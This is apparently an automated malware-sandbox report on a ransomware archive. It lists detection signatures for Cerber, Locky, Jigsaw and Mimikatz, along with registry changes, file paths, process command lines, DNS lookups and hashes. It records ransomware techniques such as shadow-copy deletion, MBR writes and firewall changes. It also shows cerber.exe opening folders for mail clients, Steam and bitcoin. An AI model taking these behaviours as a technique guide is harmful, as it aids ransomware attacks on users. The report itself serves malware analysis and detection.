Analysis Overview
SHA256
3e2ba9a25e9891c6dcb75ad73c1262d523e09f0eb3d095ede9ea9d11f42ebc28
Threat Level: Known bad
The file Ransomware-master.zip was found to be: Known bad.
Malicious Activity Summary
Mimikatz
Locky family
Cerber
Jigsaw family
Locky
Cerber family
Jigsaw Ransomware
Mimikatz family
Renames multiple (2029) files with added filename extension
mimikatz is an open source tool to dump credentials on Windows
Renames multiple (3738) files with added filename extension
Deletes shadow copies
Contacts a large (1097) amount of remote hosts
Contacts a large (1100) amount of remote hosts
Blocklisted process makes network request
Modifies Windows Firewall
Command and Scripting Interpreter: PowerShell
Drops startup file
Reads user/profile data of web browsers
Deletes itself
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Looks up external IP address via web service
Adds Run key to start application
Drops desktop.ini file(s)
Writes to the Master Boot Record (MBR)
UPX packed file
Suspicious use of SetThreadContext
Sets desktop wallpaper using registry
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Program crash
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Uses Volume Shadow Copy service COM API
Modifies Internet Explorer settings
Runs ping.exe
Suspicious behavior: MapViewOfSection
Scheduled Task/Job: Scheduled Task
Interacts with shadow copies
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious use of WriteProcessMemory
Suspicious use of UnmapMainImage
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-28 22:32
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
91s
Max time network
136s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2336 wrote to memory of 2012 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2336 wrote to memory of 2012 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2336 wrote to memory of 2012 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2012 wrote to memory of 3000 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2012 wrote to memory of 3000 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2012 wrote to memory of 3000 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2012 wrote to memory of 3000 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 27b941118e409b2d6e33cba39ef6edb0 |
| SHA1 | 79d2c3915bd94ccb79a9173167b35aa7d8aa7897 |
| SHA256 | 05536bffe91a122ed7817e0409e431022c05d87da147304634ec7eaa2774eeba |
| SHA512 | 568101a5abb9842a0a47e0250028a33ff230a7c260aafcff4bfc7a395eb5c84e42e07508538d333232bbedab54d8fcd6b6f6040c54b7bd9013afd41305907ca2 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20240903-en
Max time kernel
118s
Max time network
131s
Command Line
Signatures
Cerber
Cerber family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Contacts a large (1097) amount of remote hosts
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\documents | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpDAF4.bmp" | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\program files (x86)\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\documents | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cerber.exe
"C:\Users\Admin\AppData\Local\Temp\cerber.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
